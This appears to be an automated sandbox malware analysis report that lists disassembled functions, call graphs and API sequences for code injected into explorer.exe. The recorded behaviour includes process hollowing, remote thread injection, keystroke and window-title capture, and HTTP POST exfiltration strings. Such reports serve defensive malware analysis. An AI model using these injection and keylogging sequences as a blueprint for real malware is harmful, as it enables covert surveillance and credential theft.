c223e call c2815 360->362 361->340 364 c2243-c2250 RtlMoveMemory 362->364 364->361
                                                      APIs
                                                        • Part of subcall function 000C2861: GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                        • Part of subcall function 000C2861: RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                        • Part of subcall function 000C27E2: lstrlen.KERNEL32(000C40DA,?,00000000,00000000,000C1F86,75712B62,000C40DA,00000000), ref: 000C27EA
                                                        • Part of subcall function 000C27E2: MultiByteToWideChar.KERNEL32(00000000,00000000,000C40DA,00000001,00000000,00000000), ref: 000C27FC
                                                        • Part of subcall function 000C2374: RtlZeroMemory.NTDLL(?,00000018), ref: 000C2386
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 000C1FE2
                                                      • wsprintfW.USER32 ref: 000C211B
                                                      • wsprintfW.USER32 ref: 000C2186
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C2250
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                      • API String ID: 4204651544-1701262698
                                                      • Opcode ID: 00ced92f246b0e182e9234650c8cc5854a342da7926b47b05db65c3987913049
                                                      • Instruction ID: 54fae69973df5dc1ccceee22a7eb71274f7018e32dce13550f5358145dd9ffd7
                                                      • Opcode Fuzzy Hash: 00ced92f246b0e182e9234650c8cc5854a342da7926b47b05db65c3987913049
                                                      • Instruction Fuzzy Hash: 68A16C71609301AFD750EFA8C895F6FBBE8FB88340F14482DF985D3262DA74DA048B52
                                                      Function 000C25AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 366 c25ad-c25c9 OpenProcess 367 c25cb-c25da IsWow64Process 366->367 368 c2600-c2607 366->368 369 c25dc-c25ec IsWow64Process 367->369 370 c25f7 367->370 371 c25ee-c25f5 369->371 372 c25f9-c25fa CloseHandle 369->372 370->372 371->372 372->368
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,756F3E2E,?,?,microsoftedgecp.exe,000C1287), ref: 000C25BF
                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 000C25D1
                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 000C25E4
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C25FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                      • String ID: microsoftedgecp.exe
                                                      • API String ID: 331459951-1475183003
                                                      • Opcode ID: a4540baabe33dae65950cd7cc6724e42f4f436fe5b6b9215c9b4aa4d9b4854c7
                                                      • Instruction ID: 51389668a6011c88918ad2746a49408e0558a75df4ff7ef596840189698e615c
                                                      • Opcode Fuzzy Hash: a4540baabe33dae65950cd7cc6724e42f4f436fe5b6b9215c9b4aa4d9b4854c7
                                                      • Instruction Fuzzy Hash: 69F030B2952618FFAB10CFD49E98DEF77ACEB01255B24426EF90492540D7354F04EAA4
                                                      Function 000C1B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 421 c1b17-c1b2c 422 c1b2e 421->422 423 c1b60-c1b68 421->423 424 c1b30-c1b5e RtlMoveMemory 422->424 425 c1b6a-c1b6f 423->425 426 c1bc3-c1bcb 423->426 424->423 424->424 427 c1bbe-c1bc1 425->427 428 c1bcd-c1bdf 426->428 429 c1c0b 426->429 427->426 431 c1b71-c1b84 LoadLibraryA 427->431 428->429 432 c1be1-c1bfe LdrProcessRelocationBlock 428->432 430 c1c0d-c1c12 429->430 433 c1b8a-c1b8f 431->433 434 c1c15-c1c17 431->434 432->429 435 c1c00-c1c04 432->435 436 c1bb6-c1bb9 433->436 434->430 435->429 437 c1c06-c1c09 435->437 438 c1bbb 436->438 439 c1b91-c1b95 436->439 437->429 437->432 438->427 440 c1b9c-c1b9f 439->440 441 c1b97-c1b9a 439->441 442 c1ba1-c1bab GetProcAddress 440->442 441->442 442->434 443 c1bad-c1bb3 442->443 443->436
                                                      APIs
                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 000C1B4E
                                                      • LoadLibraryA.KERNEL32(?), ref: 000C1B76
                                                      • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 000C1BA3
                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 000C1BF4
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                      • String ID:
                                                      • API String ID: 3827878703-0
                                                      • Opcode ID: 0135a604dd96a555f643a9e8859a7785559c2f12238049f69cf416a4f6a4413e
                                                      • Instruction ID: 9de573e9276804b81e187fb20ce1929492434760ba543e7ad1151f0902c6dded
                                                      • Opcode Fuzzy Hash: 0135a604dd96a555f643a9e8859a7785559c2f12238049f69cf416a4f6a4413e
                                                      • Instruction Fuzzy Hash: F9318276700215ABCB64CF29C894FAAB7E8BF16315F14456DE846C7202E735EC45CBA0

                                                      Execution Graph

                                                      Execution Coverage:8.7%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:9
                                                      Total number of Limit Nodes:2
                                                      execution_graph 764 69fab 765 6a1f3 764->765 766 69fd8 764->766 769 6a048 766->769 770 6a04d 769->770 771 6a135 LoadLibraryA 770->771 772 6a190 VirtualProtect VirtualProtect 770->772 774 69ff8 770->774 771->770 773 6a1e8 772->773 773->773

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00061A04 1 Function_00061405 2 Function_00061000 3 Function_00062E80 4 Function_0006188C 27 Function_00061838 4->27 5 Function_0006A00A 6 Function_00063088 14 Function_00062E98 6->14 52 Function_00061B70 6->52 7 Function_00062E08 15 Function_00062418 7->15 39 Function_00061D50 7->39 44 Function_00061860 7->44 48 Function_000618E8 7->48 8 Function_00062508 30 Function_000625C4 8->30 40 Function_000618D0 8->40 43 Function_000624E0 8->43 9 Function_00061C08 10 Function_00061A88 11 Function_00061508 12 Function_00062010 12->0 13 Function_0006141D 14->0 14->7 29 Function_00062CB8 14->29 37 Function_00061DD4 14->37 51 Function_00062BF4 14->51 54 Function_00062B70 14->54 15->27 38 Function_00062054 15->38 15->44 16 Function_000645A7 17 Function_0006B124 18 Function_00061822 19 Function_00063020 19->14 19->52 20 Function_00061D20 21 Function_00062620 22 Function_00063220 22->9 24 Function_00061C28 22->24 26 Function_00061BB0 22->26 22->27 28 Function_00061938 22->28 46 Function_00062860 22->46 22->52 23 Function_00069FAB 33 Function_0006A048 23->33 25 Function_000614B2 29->20 29->27 29->44 56 Function_000625FC 30->56 31 Function_00061F40 31->27 57 Function_000618F8 31->57 32 Function_00064A41 33->5 34 Function_000641C9 35 Function_00061254 36 Function_000614D4 37->27 38->4 38->12 38->27 38->28 38->31 38->40 38->44 53 Function_00061E70 38->53 38->57 39->27 41 Function_0006355C 41->22 41->27 41->41 41->52 55 Function_000630F0 41->55 42 Function_00061C58 44->52 45 Function_00061560 46->21 50 Function_00062774 46->50 46->52 47 Function_0006156C 49 Function_00061576 54->0 54->27 55->8 55->10 55->27 55->42 55->44 58 Function_000614F9

                                                      Executed Functions

                                                      Function 0006355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 118 6355c-6356c call 61b70 121 63572-635a5 call 61838 118->121 122 635fc-63601 118->122 126 635a7 call 61838 121->126 127 635d1-635f6 NtUnmapViewOfSection 121->127 129 635ac-635c5 126->129 131 63608-63617 call 63220 127->131 132 635f8-635fa 127->132 129->127 137 63621-6362a 131->137 138 63619-6361c call 6355c 131->138 132->122 133 63602-63607 call 630f0 132->133 133->131 138->137
                                                      APIs
                                                      • NtUnmapViewOfSection.NTDLL ref: 000635D8
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_61000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                      • Instruction ID: a7e1edf78df86a80834df86f870b15e34a0a18ae6f39641b0afaeab6d9e318a2
                                                      • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                      • Instruction Fuzzy Hash: 97119430615E095FFB5CBBB898AD2B937E2EB54301F54412AA81AC76A2DF398A40C741
                                                      Function 00063220 Relevance: 9.2, APIs: 6, Instructions: 241processstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 63220-6325b call 61838 3 63261-63273 CreateToolhelp32Snapshot 0->3 4 63549-63554 SleepEx 3->4 5 63279-6328f Process32First 3->5 4->3 6 63538-6353a 5->6 7 63294-632ac lstrcmpi 6->7 8 63540-63543 CloseHandle 6->8 9 632b2-632c6 7->9 10 6348c-63495 call 61bb0 7->10 8->4 9->10 16 632cc-632e0 9->16 14 6352a-63532 Process32Next 10->14 15 6349b-634a4 call 61c08 10->15 14->6 15->14 20 634aa-634b1 call 61c28 15->20 16->10 21 632e6-632fa 16->21 20->14 26 634b3-634c1 call 61b70 20->26 21->10 25 63300-63314 21->25 25->10 30 6331a-6332e 25->30 26->14 31 634c3-63525 call 61938 call 62860 call 61938 26->31 30->10 34 63334-63348 30->34 31->14 34->10 40 6334e-63362 34->40 40->10 43 63368-6337c 40->43 43->10 45 63382-63396 43->45 45->10 47 6339c-633b0 45->47 47->10 49 633b6-633ca 47->49 49->10 51 633d0-633e4 49->51 51->10 53 633ea-633fe 51->53 53->10 55 63404-63418 53->55 55->10 57 6341a-6342e 55->57 57->10 59 63430-63444 57->59 59->10 61 63446-6345a 59->61 61->10 63 6345c-63470 61->63 63->10 65 63472-63486 63->65 65->10 65->14
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_61000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32lstrcmpi
                                                      • String ID:
                                                      • API String ID: 1122579583-0
                                                      • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                      • Instruction ID: 28e577ad9dc82d99a2c89217d31615d83bbaf6f9860ed4cfdaa8213d510eb323
                                                      • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                      • Instruction Fuzzy Hash: 42812131218A088FE756EF54E858BEAB7E2FB51741F44471AA453C71A0EF78EA04CBC1
                                                      Function 0006A048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 67 6a048-6a04b 68 6a055-6a059 67->68 69 6a065 68->69 70 6a05b-6a063 68->70 71 6a067 69->71 72 6a04d-6a053 69->72 70->69 73 6a06a-6a071 71->73 72->68 75 6a073-6a07b 73->75 76 6a07d 73->76 75->76 76->73 77 6a07f-6a082 76->77 78 6a097-6a0a4 77->78 79 6a084-6a092 77->79 91 6a0a6-6a0a8 78->91 92 6a0be-6a0cc call 6a00a 78->92 80 6a094-6a095 79->80 81 6a0ce-6a0e9 79->81 80->78 82 6a11a-6a11d 81->82 84 6a122-6a129 82->84 85 6a11f-6a120 82->85 87 6a12f-6a133 84->87 86 6a101-6a105 85->86 89 6a107-6a10a 86->89 90 6a0eb-6a0ee 86->90 93 6a135-6a14e LoadLibraryA 87->93 94 6a190-6a1e4 VirtualProtect * 2 87->94 89->84 95 6a10c-6a110 89->95 90->84 100 6a0f0 90->100 96 6a0ab-6a0b2 91->96 92->68 99 6a14f-6a156 93->99 97 6a1e8-6a1ed 94->97 101 6a112-6a119 95->101 102 6a0f1-6a0f5 95->102 111 6a0b4-6a0ba 96->111 112 6a0bc 96->112 97->97 103 6a1ef-6a1fe 97->103 99->87 105 6a158 99->105 100->102 101->82 102->86 110 6a0f7-6a0f9 102->110 108 6a164-6a16c 105->108 109 6a15a-6a162 105->109 113 6a16e-6a17a 108->113 109->113 110->86 114 6a0fb-6a0ff 110->114 111->112 112->92 112->96 116 6a185-6a18f 113->116 117 6a17c-6a183 113->117 114->86 114->89 117->99
                                                      APIs
                                                      • LoadLibraryA.KERNEL32 ref: 0006A147
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0006A1BB
                                                      • VirtualProtect.KERNELBASE ref: 0006A1D9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.628348956.0000000000067000.00000040.80000000.00040000.00000000.sdmp, Offset: 00067000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_67000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 895956442-0
                                                      • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                      • Instruction ID: cdcb3d13d9fcc50474130bbeb187b8e8950aabbb2f1cede5e515d202ea7ed807
                                                      • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                      • Instruction Fuzzy Hash: A151993135891D0ADB24BA3C9CC47B9B3C3E75B325F18062AC48AD7285D919D8868B83

                                                      Execution Graph

                                                      Execution Coverage:9.5%
                                                      Dynamic/Decrypted Code Coverage:97.5%
                                                      Signature Coverage:17.7%
                                                      Total number of Nodes:322
                                                      Total number of Limit Nodes:4
                                                      execution_graph 1017 8162b 1018 8163c 1017->1018 1023 816aa 1017->1023 1019 8164b GetKeyboardState 1018->1019 1018->1023 1020 8165c ToUnicode 1019->1020 1019->1023 1021 81684 1020->1021 1021->1023 1024 816b9 RtlEnterCriticalSection 1021->1024 1025 817ce RtlLeaveCriticalSection 1024->1025 1026 816d2 lstrlenW 1024->1026 1025->1023 1027 817bd 1026->1027 1028 816ed lstrlenW 1026->1028 1027->1025 1029 81702 1028->1029 1030 8174e GetForegroundWindow 1029->1030 1031 81723 1029->1031 1030->1027 1032 8175a GetWindowTextW 1030->1032 1031->1027 1043 817dc 1031->1043 1033 8177a lstrcmpW 1032->1033 1034 81771 GetClassNameW 1032->1034 1036 8178b lstrcpyW 1033->1036 1037 817bf lstrcatW 1033->1037 1034->1033 1039 817dc 4 API calls 1036->1039 1037->1027 1038 8172f wsprintfW 1040 817b6 1038->1040 1041 81798 wsprintfW 1039->1041 1042 829eb 3 API calls 1040->1042 1041->1040 1042->1027 1046 82a09 GetProcessHeap RtlAllocateHeap 1043->1046 1045 817ed GetLocalTime wsprintfW 1045->1038 1046->1045 1047 8182d 1048 81838 RtlEnterCriticalSection lstrlenW 1047->1048 1049 818a8 RtlLeaveCriticalSection Sleep 1048->1049 1053 81854 1048->1053 1049->1048 1052 829eb VirtualQuery GetProcessHeap HeapFree 1052->1053 1053->1049 1053->1052 1056 825a4 1053->1056 1062 8200d 1053->1062 1073 829ae VirtualFree 1053->1073 1074 82a09 GetProcessHeap RtlAllocateHeap 1053->1074 1057 825e8 1056->1057 1058 825b9 CryptBinaryToStringA 1056->1058 1057->1053 1058->1057 1059 825cc 1058->1059 1075 82a09 GetProcessHeap RtlAllocateHeap 1059->1075 1061 825d7 CryptBinaryToStringA 1061->1057 1063 82030 1062->1063 1064 82023 lstrlen 1062->1064 1076 82a09 GetProcessHeap RtlAllocateHeap 1063->1076 1064->1063 1066 82038 lstrcat 1067 8206d lstrcat 1066->1067 1068 82074 1066->1068 1067->1068 1077 820a1 1068->1077 1071 829eb 3 API calls 1072 82097 1071->1072 1072->1053 1073->1053 1074->1053 1075->1061 1076->1066 1111 8240f 1077->1111 1081 820ce 1116 8298a lstrlen MultiByteToWideChar 1081->1116 1083 820dd 1117 824cc RtlZeroMemory 1083->1117 1086 8212f RtlZeroMemory 1088 82164 1086->1088 1087 829eb 3 API calls 1089 82084 1087->1089 1092 823f1 1088->1092 1094 82192 1088->1094 1119 8243d 1088->1119 1089->1071 1091 823d7 1091->1092 1093 829eb 3 API calls 1091->1093 1092->1087 1093->1092 1094->1091 1128 82a09 GetProcessHeap RtlAllocateHeap 1094->1128 1096 82262 wsprintfW 1097 82288 1096->1097 1101 822f5 1097->1101 1129 82a09 GetProcessHeap RtlAllocateHeap 1097->1129 1099 822c2 wsprintfW 1099->1101 1100 823b4 1102 829eb 3 API calls 1100->1102 1101->1100 1130 82a09 GetProcessHeap RtlAllocateHeap 1101->1130 1104 823c8 1102->1104 1104->1091 1105 829eb 3 API calls 1104->1105 1105->1091 1106 823ad 1109 829eb 3 API calls 1106->1109 1107 82340 1107->1106 1131 829bd VirtualAlloc 1107->1131 1109->1100 1110 8239a RtlMoveMemory 1110->1106 1112 820c0 1111->1112 1113 82419 1111->1113 1115 82a09 GetProcessHeap RtlAllocateHeap 1112->1115 1114 82841 2 API calls 1113->1114 1114->1112 1115->1081 1116->1083 1118 820ed 1117->1118 1118->1086 1118->1092 1121 8244a 1119->1121 1123 824ab 1119->1123 1120 8244e DnsQuery_W 1120->1121 1121->1120 1122 8248d DnsFree inet_ntoa 1121->1122 1121->1123 1122->1121 1124 824ad 1122->1124 1123->1094 1132 82a09 GetProcessHeap RtlAllocateHeap 1124->1132 1126 824b7 1133 8298a lstrlen MultiByteToWideChar 1126->1133 1128->1096 1129->1099 1130->1107 1131->1110 1132->1126 1133->1123 770 89ae0 771 89ca4 770->771 772 89aeb 770->772 771->771 773 89bfa LoadLibraryA 772->773 777 89c3f VirtualProtect VirtualProtect 772->777 774 89c11 773->774 774->772 776 89c23 GetProcAddress 774->776 776->774 778 89c39 776->778 777->771 779 81000 780 81010 779->780 781 81007 779->781 783 81016 781->783 823 82724 VirtualQuery 783->823 786 81098 786->780 788 8102c RtlMoveMemory 789 8104d 788->789 790 81072 NtUnmapViewOfSection GetCurrentProcessId 788->790 851 82a09 GetProcessHeap RtlAllocateHeap 789->851 792 8109f 790->792 793 81093 790->793 826 810a5 792->826 793->786 794 81096 793->794 852 813ae RtlZeroMemory VirtualQuery 794->852 796 81053 RtlMoveMemory 796->790 797 810a4 799 82a09 GetProcessHeap RtlAllocateHeap 797->799 800 810bf 799->800 801 82a09 GetProcessHeap RtlAllocateHeap 800->801 802 810cc wsprintfA 801->802 806 810f3 802->806 803 8276d OpenFileMappingA MapViewOfFile 803->806 804 8129a Sleep 804->806 805 82841 lstrlen lstrlen 805->806 806->803 806->804 806->805 807 8275a UnmapViewOfFile CloseHandle 806->807 808 81148 806->808 807->804 808->806 809 82a09 GetProcessHeap RtlAllocateHeap 808->809 812 829eb VirtualQuery GetProcessHeap HeapFree 808->812 814 8127e CloseHandle 808->814 817 81266 Process32Next 808->817 818 812ae 16 API calls 808->818 819 826c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 808->819 820 82724 VirtualQuery 808->820 821 81208 lstrcmpi 808->821 822 818bf 30 API calls 808->822 810 81150 RtlMoveMemory CreateToolhelp32Snapshot 809->810 810->808 811 81171 Process32First 810->811 813 8118d 811->813 811->814 812->808 815 81190 CharLowerA 813->815 814->808 816 811ab lstrcmpi 815->816 815->817 816->808 816->817 817->808 817->815 818->808 819->808 820->808 821->808 822->808 824 8101e 823->824 824->786 825 82a09 GetProcessHeap RtlAllocateHeap 824->825 825->788 881 82a09 GetProcessHeap RtlAllocateHeap 826->881 828 810bf 882 82a09 GetProcessHeap RtlAllocateHeap 828->882 830 810cc wsprintfA 834 810f3 830->834 832 8129a Sleep 832->834 833 82841 lstrlen lstrlen 833->834 834->832 834->833 836 81148 834->836 883 8276d OpenFileMappingA 834->883 948 8275a UnmapViewOfFile CloseHandle 834->948 836->834 842 8127e CloseHandle 836->842 845 81266 Process32Next 836->845 848 82724 VirtualQuery 836->848 849 81208 lstrcmpi 836->849 886 82a09 GetProcessHeap RtlAllocateHeap 836->886 887 812ae 836->887 906 826c9 OpenProcess 836->906 912 818bf 836->912 943 829eb 836->943 838 81150 RtlMoveMemory CreateToolhelp32Snapshot 838->836 839 81171 Process32First 838->839 841 8118d 839->841 839->842 843 81190 CharLowerA 841->843 842->836 844 811ab lstrcmpi 843->844 843->845 844->836 844->845 845->836 845->843 848->836 849->836 851->796 853 813e4 852->853 973 82a09 GetProcessHeap RtlAllocateHeap 853->973 855 81402 GetModuleFileNameA 974 82a09 GetProcessHeap RtlAllocateHeap 855->974 857 81418 GetCurrentProcessId wsprintfA 975 82799 CryptAcquireContextA 857->975 860 8151b 862 829eb 3 API calls 860->862 861 8145f RtlInitializeCriticalSection 980 82a09 GetProcessHeap RtlAllocateHeap 861->980 864 81522 862->864 866 829eb 3 API calls 864->866 865 8147f Sleep 981 825f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 865->981 868 81529 RtlExitUserThread 866->868 870 81533 868->870 869 81496 GetModuleHandleA GetProcAddress 871 814b5 869->871 872 814c6 GetModuleHandleA GetProcAddress 869->872 870->792 989 81f3a 871->989 874 814d9 872->874 875 814ea GetModuleHandleA 872->875 876 81f3a 3 API calls 874->876 999 81e89 875->999 876->875 879 825f1 10 API calls 880 81501 CreateThread CloseHandle 879->880 880->860 881->828 882->830 884 82781 MapViewOfFile 883->884 885 82794 883->885 884->885 885->834 886->838 888 812c5 887->888 904 813a4 887->904 888->904 949 829bd VirtualAlloc 888->949 890 812d9 lstrlen 950 82a09 GetProcessHeap RtlAllocateHeap 890->950 892 812f0 893 81351 892->893 951 82841 lstrlen lstrlen 892->951 895 829eb 3 API calls 893->895 903 81375 895->903 897 81399 957 829ae VirtualFree 897->957 898 81329 RtlMoveMemory 953 82569 898->953 899 81353 RtlMoveMemory 902 82569 2 API calls 899->902 902->893 903->897 905 81388 PathMatchSpecA 903->905 904->836 905->897 905->903 907 8271c 906->907 908 826e7 IsWow64Process 906->908 907->836 909 826f8 IsWow64Process 908->909 910 8270a 908->910 909->910 911 82715 CloseHandle 909->911 910->911 911->907 913 82724 VirtualQuery 912->913 914 818d9 913->914 915 818eb OpenProcess 914->915 916 81b1c 914->916 915->916 917 81904 915->917 916->836 918 82724 VirtualQuery 917->918 919 8190b 918->919 919->916 920 81919 NtSetInformationProcess 919->920 921 81935 919->921 920->921 958 81b26 921->958 924 81b26 2 API calls 925 8197c 924->925 926 81b19 CloseHandle 925->926 927 81b26 2 API calls 925->927 926->916 928 819a6 927->928 964 81bbd 928->964 931 81b26 2 API calls 932 819d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 931->932 933 81a2b 932->933 934 81af4 CreateRemoteThread 932->934 935 81a31 CreateMutexA GetLastError 933->935 939 81a61 GetModuleHandleA GetProcAddress ReadProcessMemory 933->939 936 81b0b CloseHandle 934->936 935->933 937 81a4d CloseHandle Sleep 935->937 938 81b0d CloseHandle CloseHandle 936->938 937->935 938->926 940 81aed 939->940 941 81a92 WriteProcessMemory 939->941 940->936 940->938 941->940 942 81abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 941->942 942->940 944 82724 VirtualQuery 943->944 945 829f3 944->945 946 82a07 945->946 947 829f7 GetProcessHeap HeapFree 945->947 946->836 947->946 948->832 949->890 950->892 952 8130c RtlZeroMemory 951->952 952->898 952->899 954 825a1 953->954 955 82577 lstrlen RtlMoveMemory 953->955 954->892 955->954 957->904 959 81b3a 958->959 962 8195a 958->962 960 81b4a NtCreateSection 959->960 961 81b69 959->961 960->961 961->962 963 81b7e NtMapViewOfSection 961->963 962->924 963->962 965 81bd4 964->965 971 81c06 964->971 966 81bd6 RtlMoveMemory 965->966 966->966 966->971 967 81c69 968 819b6 NtUnmapViewOfSection 967->968 970 81c87 LdrProcessRelocationBlock 967->970 968->931 969 81c17 LoadLibraryA 969->968 969->971 970->967 970->968 971->967 971->969 972 81c47 GetProcAddress 971->972 972->968 972->971 973->855 974->857 976 81445 CreateMutexA GetLastError 975->976 977 827bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 975->977 976->860 976->861 978 82805 wsprintfA 977->978 978->978 979 82827 CryptDestroyHash CryptReleaseContext 978->979 979->976 980->865 982 82631 981->982 983 82681 CloseHandle 982->983 984 82671 Thread32Next 982->984 985 8263d OpenThread 982->985 983->869 984->982 986 82658 SuspendThread 985->986 987 82660 ResumeThread 985->987 988 82666 CloseHandle 986->988 987->988 988->984 990 81fad 989->990 991 81f44 989->991 990->872 991->990 1008 81fea VirtualProtect 991->1008 993 81f5b 993->990 1009 829bd VirtualAlloc 993->1009 995 81f67 996 81f71 RtlMoveMemory 995->996 997 81f84 995->997 996->997 1010 81fea VirtualProtect 997->1010 1000 82724 VirtualQuery 999->1000 1001 81e93 1000->1001 1002 814fa 1001->1002 1011 81ed8 1001->1011 1002->879 1006 81eba 1006->1002 1016 81fea VirtualProtect 1006->1016 1008->993 1009->995 1010->990 1012 81eea 1011->1012 1014 81e9e 1011->1014 1013 81f04 lstrcmp 1012->1013 1012->1014 1013->1012 1013->1014 1014->1002 1015 81fea VirtualProtect 1014->1015 1015->1006 1016->1002 1134 81581 1135 8158e 1134->1135 1136 81623 1135->1136 1137 815a7 GlobalFix 1135->1137 1137->1136 1138 815b5 1137->1138 1139 815c0 1138->1139 1140 815e4 1138->1140 1142 815f2 1139->1142 1143 815c5 lstrlenW 1139->1143 1155 8293e 1140->1155 1144 82724 VirtualQuery 1142->1144 1154 82a09 GetProcessHeap RtlAllocateHeap 1143->1154 1146 815fb 1144->1146 1148 8161b GlobalUnWire 1146->1148 1149 815ff lstrlenW 1146->1149 1147 815d8 lstrcatW 1147->1142 1148->1136 1149->1148 1150 8160a 1149->1150 1151 816b9 19 API calls 1150->1151 1152 81614 1151->1152 1153 829eb 3 API calls 1152->1153 1153->1148 1154->1147 1156 8294d lstrlen 1155->1156 1157 82982 1155->1157 1162 82a09 GetProcessHeap RtlAllocateHeap 1156->1162 1157->1142 1159 82963 MultiByteToWideChar 1159->1157 1160 8297b 1159->1160 1161 829eb 3 API calls 1160->1161 1161->1157 1162->1159

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00081E89 18 Function_00082724 0->18 37 Function_00081ED8 0->37 43 Function_00081FEA 0->43 1 Function_00082A09 2 Function_0008298A 3 Function_0008200D 3->1 17 Function_000820A1 3->17 44 Function_000829EB 3->44 4 Function_0008288D 5 Function_0008268F 6 Function_0008240F 36 Function_00082841 6->36 7 Function_00081000 10 Function_00081016 7->10 8 Function_00081581 8->1 8->18 24 Function_000816B9 8->24 29 Function_0008293E 8->29 8->44 9 Function_00082799 10->1 10->4 10->5 14 Function_000812AE 10->14 15 Function_000826AE 10->15 16 Function_000813AE 10->16 10->18 20 Function_000810A5 10->20 30 Function_000818BF 10->30 34 Function_000826C9 10->34 10->36 38 Function_0008275A 10->38 10->44 45 Function_0008276D 10->45 11 Function_0008162B 11->24 12 Function_0008182D 12->1 12->3 13 Function_000829AE 12->13 19 Function_000825A4 12->19 12->44 14->1 14->13 26 Function_000829BD 14->26 14->36 39 Function_0008255C 14->39 41 Function_00082569 14->41 14->44 16->0 16->1 16->9 25 Function_00081F3A 16->25 16->44 48 Function_000825F1 16->48 17->1 17->2 17->4 17->6 17->26 28 Function_0008243D 17->28 35 Function_000824CC 17->35 17->44 19->1 20->1 20->4 20->5 20->14 20->15 20->18 20->30 20->34 20->36 20->38 20->44 20->45 21 Function_00081E26 31 Function_00081CBF 21->31 22 Function_00081B26 23 Function_00083627 40 Function_000817DC 24->40 24->44 25->26 33 Function_00081FB4 25->33 25->43 47 Function_00081E66 25->47 27 Function_00081BBD 28->1 28->2 29->1 29->44 30->18 30->22 30->27 32 Function_00081533 33->21 40->1 42 Function_000829E9 44->18 46 Function_00089AE0 47->31

                                                      Executed Functions

                                                      Function 00081016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193stringsleepprocessCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
